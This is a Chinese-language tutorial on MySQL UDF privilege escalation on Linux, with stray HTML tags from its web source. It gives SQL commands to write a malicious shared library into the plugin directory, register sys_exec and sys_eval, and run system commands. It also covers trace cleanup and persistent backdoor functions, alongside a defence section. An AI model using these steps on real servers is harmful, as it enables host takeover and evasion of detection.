MySQL UDF提权技术详解（Linux平台）<\/h1>

一、UDF提权原理<\/h2>

UDF (User Defined Function) 是MySQL数据库的功能扩展机制，允许用户通过自定义函数实现MySQL原生不支持的功能。UDF提权的核心原理是：<\/p>

通过MySQL的动态链接库文件导入自定义函数<\/li>
这些自定义函数可以在SQL语句中调用，如同调用原生函数(如version())<\/li>

精心构造的自定义函数可以执行系统命令，从而实现权限提升<\/li> <\/ol>

二、前提条件<\/h2>

要成功利用UDF提权，必须满足以下条件：<\/p>

高权限数据库用户<\/strong>：需要root或具有FILE权限的MySQL用户<\/li>

secure_file_priv设置<\/strong>：

MySQL 5.5之前：默认空值，可向任意绝对路径写文件<\/li>
MySQL 5.5之后：默认NULL，无法写入文件（无法直接利用）<\/li> <\/ul> <\/li>
MySQL插件目录写入权限<\/strong>：需要能向plugin_dir指定的目录写入文件<\/li> <\/ol>
三、信息收集阶段<\/h2>
在实施UDF提权前，需要进行以下信息收集：<\/p>
-- 查看插件目录位置 <\/span><\/span><\/span><\/span>show<\/span> variables like<\/span> '%plugin%'<\/span>; <\/span><\/span> <\/span><\/span>-- 检查是否已有UDF函数 <\/span><\/span><\/span><\/span>select<\/span> *<\/span> from<\/span> func; <\/span><\/span> <\/span><\/span>-- 查看文件写入限制 <\/span><\/span><\/span><\/span>select<\/span> @@<\/span>secure_file_priv; <\/span><\/span><\/code><\/pre>关键变量plugin_dir<\/code>显示了MySQL插件安装路径（如\/usr\/lib\/mysql\/plugin\/<\/code>），这是我们需要写入恶意库文件的目标位置。<\/p> 四、UDF提权核心步骤<\/h2> 1. 准备恶意动态库<\/h3> 需要准备一个包含恶意功能的.so文件（Linux平台），通常包含以下功能函数：<\/p> sys_exec<\/code> - 执行系统命令<\/li> sys_eval<\/code> - 执行系统命令并返回输出<\/li> <\/ul> 2. 写入恶意库到插件目录<\/h3> 使用MySQL的写入功能将.so文件写入插件目录：<\/p> -- 将十六进制表示的.so文件内容写入目标路径 <\/span><\/span><\/span><\/span>SELECT<\/span> 0<\/span>x7f454c4602... INTO<\/span> DUMPFILE '\/usr\/lib\/mysql\/plugin\/lib_mysqludf_sys.so'<\/span>; <\/span><\/span><\/code><\/pre>注意：十六进制内容应为完整的.so文件二进制内容。<\/p> 3. 创建UDF函数<\/h3> -- 创建函数关联到库中的恶意函数 <\/span><\/span><\/span><\/span>CREATE<\/span> FUNCTION<\/span> sys_exec RETURNS<\/span> INT SONAME 'lib_mysqludf_sys.so'<\/span>; <\/span><\/span>CREATE<\/span> FUNCTION<\/span> sys_eval RETURNS<\/span> STRING SONAME 'lib_mysqludf_sys.so'<\/span>; <\/span><\/span><\/code><\/pre>4. 执行系统命令<\/h3> -- 使用sys_exec执行命令（无回显） <\/span><\/span><\/span><\/span>SELECT<\/span> sys_exec('id > \/tmp\/uid.txt'<\/span>); <\/span><\/span> <\/span><\/span>-- 使用sys_eval执行命令并获取输出 <\/span><\/span><\/span><\/span>SELECT<\/span> sys_eval('id'<\/span>); <\/span><\/span><\/code><\/pre>五、防御措施<\/h2> 最小权限原则<\/strong>：MySQL服务账户应使用低权限用户运行<\/li> secure_file_priv设置<\/strong>：应设置为NULL或特定目录<\/li> 插件目录权限<\/strong>：严格控制plugin_dir的写入权限<\/li> UDF函数审计<\/strong>：定期检查func表中注册的函数<\/li> 禁用UDF<\/strong>：不需要时可禁用UDF功能<\/li> <\/ol> 六、技术限制<\/h2> MySQL 5.5+版本默认secure_file_priv=NULL，增加了利用难度<\/li> 需要MySQL高权限账户<\/li> 需要插件目录可写权限<\/li> 部分系统可能有SELinux等额外安全限制<\/li> <\/ol> 七、高级技巧<\/h2> 绕过secure_file_priv<\/strong>：如果web目录可写，可尝试写入web目录通过web执行<\/li> 自定义库开发<\/strong>：可开发更隐蔽的恶意库文件<\/li> 权限维持<\/strong>：创建持久化后门函数<\/li> <\/ol> 八、清理痕迹<\/h2> 提权成功后应清理痕迹：<\/p> -- 删除函数 <\/span><\/span><\/span><\/span>DROP<\/span> FUNCTION<\/span> sys_exec; <\/span><\/span>DROP<\/span> FUNCTION<\/span> sys_eval; <\/span><\/span> <\/span><\/span>-- 删除库文件（需系统权限） <\/span><\/span><\/span><\/span>SELECT<\/span> sys_exec('rm \/usr\/lib\/mysql\/plugin\/lib_mysqludf_sys.so'<\/span>); <\/span><\/span><\/code><\/pre>注意：实际攻击行为可能违反法律，本文仅用于安全研究和技术防御参考。<\/p>